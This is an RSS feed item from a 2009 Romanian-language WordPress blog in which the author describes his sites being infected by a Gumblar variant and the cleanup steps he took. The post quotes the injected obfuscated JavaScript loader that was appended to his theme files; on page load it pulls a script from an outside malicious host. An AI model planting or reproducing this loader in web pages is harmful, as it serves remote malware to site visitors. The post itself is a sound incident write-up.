<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Bogdan&#039;s Blog &#187; injection wordpress</title>
	<atom:link href="http://www.bogdanblog.net/tag/injection-wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bogdanblog.net</link>
	<description>wordpress tips &#38; tricks, blogging, wordpress theme, blog bogdan, matei bogdan</description>
	<lastBuildDate>Wed, 07 Apr 2010 17:29:04 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Wordpress infectat [malicious javascript code]</title>
		<link>http://www.bogdanblog.net/wordpress-infectat-malicious-javascript-code/</link>
		<comments>http://www.bogdanblog.net/wordpress-infectat-malicious-javascript-code/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 19:55:22 +0000</pubDate>
		<dc:creator>Bogdan</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[injection wordpress]]></category>
		<category><![CDATA[javascript code]]></category>
		<category><![CDATA[malicious]]></category>

		<guid isPermaLink="false">http://www.bogdanblog.net/?p=97</guid>
		<description><![CDATA[Am reuşit în urmă cu vreo 4 zile să infectez toate site-urile pe care le aveam in Total Commander cu un ratat de virus, cu o variantă mai nouă a virusului gumblar. Eu dăteam vina pe cei de la webfactor (sorry)&#8230; cică se lucreaza la servere când colo toate wordpress-urile mele erau ciuruite.
Ce trebuie să [...]]]></description>
			<content:encoded><![CDATA[<p>Am reuşit în urmă cu vreo 4 zile să infectez toate site-urile pe care le aveam in Total Commander cu un ratat de virus, cu o variantă mai nouă a virusului <a href="http://www.google.com/#hl=en&amp;q=gumblar+virus&amp;aq=0&amp;aqi=g5g-m3&amp;oq=gumblar+vi&amp;fp=b36c7832dbb01be6">gumblar</a>. Eu dăteam vina pe cei de la <a href="http://www.webfactor.ro/">webfactor</a> (sorry)&#8230; cică se lucreaza la servere când colo toate wordpress-urile mele erau ciuruite.</p>
<h2>Ce trebuie să faci?</h2>
<p>După ce am citit la <a href="http://deceblog.net/2009/12/cum-am-scapat-de-injectionul-javascript-scriptgnu-gpl-trywindow-onload/">dece</a> ce trebuie să fac in situaţia asta, am schimbat imediat parolele de FTP, am făcut update la wordpress, am luat la puricat fiecare temă in parte şi am scanat cu <a href="http://www.malwarebytes.org/mbam-download.php">Malwarebytes Anti-Malware</a>. Fişierele infectate din temele wordpress au fost <strong>index.php</strong>, <strong>home.php</strong> şi toate <strong>fişierele jav</strong> a care existau in tema respectivă. Fiecare document avea la sfârşit adăugată minunea, cod ce incărca fişiere malware de pe alte servere (era bine dacă o incărca si pe mă-sa).</p>
<blockquote><p>< script >/*GNU GPL*/ try{window.onload = function(){var Dlo228l8u771kzw = document.createElement(&#8217;script&#8217;);Dlo228l8u771kzw.setAttribute(&#8216;type&#8217;, &#8216;text/javascript&#8217;);Dlo228l8u771kzw.setAttribute(&#8216;id&#8217;, &#8216;myscript1&#8242;);Dlo228l8u771kzw.setAttribute(&#8217;src&#8217;,  &#8216;h@(t#t^^!p#&#038;:@^$(/$/(j^#^o^o(#$m&#038;)$l$(@!#a$^-!&#038;^$)o@@r##!!g^!(^.$$^s))$p(@(a@@n@)#k^@#w&#038;)i#$r(e(.$!&#c!@o!^()!m#.!&#038;w())3(^@s$&#038;^c$)h&#038;(o#!o&#l&#038;@s!^&#038;-(c#o(#)m@$.&#038;(e$@&#038;!a^s(y(t(a$(^)b)!&#038;l&#038;e@!t(e)(n!n$#)i^(^!s@.^(r^#^$u(#:&#038;8^$)0)^#8^(!0^/!#g##@$$o&#038;o#$g#l!e^($.(@c#o^!)m@/(g&#038;$^o(@o$#(^g($l!e@.##c$)$(o$)!!m^$/($!b!)$)i$n#(g)!.^!c((@&#038;@o^$m)$)/&#038;!&#038;g$(($o)o)@((g#&#038;&#038;l(!e@$.(f($)^&#038;r@&#038;!#/!w@(o(^!r)d()$!#p)!^r(e@#s&#038;)!s(^!@.^(&#038;o$#@r((g^/^^@&#8217;.replace(/\!|@|&#038;|\)|\$|\(|#|\^/ig, &#8221;));Dlo228l8u771kzw.setAttribute(&#8216;defer&#8217;, &#8216;defer&#8217;);document.body.appendChild(Dlo228l8u771kzw);}} catch(e) {}< /script ></p></blockquote>
<h2>Cum am luat acest virus?</h2>
<p>Datorită folosirii <span style="text-decoration: line-through;">intense</span> [a]  Internet Explorer-ului. Bă mă laşi? Nu folosesc IE decât atunci când vreau să testez o temă wordpress (pe localhost, atât) dar şi atunci folosesc <a href="http://my-debugbar.com/wiki/IETester/HomePage">IETester</a>.<br />
În caz că vă intrebaţi d&#8217;aia a fost blogu&#8217; meu down vreo 3-4 zile. ;(</p>
<p>PS: Ce client FTP imi puteţi recomanda in loc de TotalCommander?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bogdanblog.net/wordpress-infectat-malicious-javascript-code/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
	</channel>
</rss>
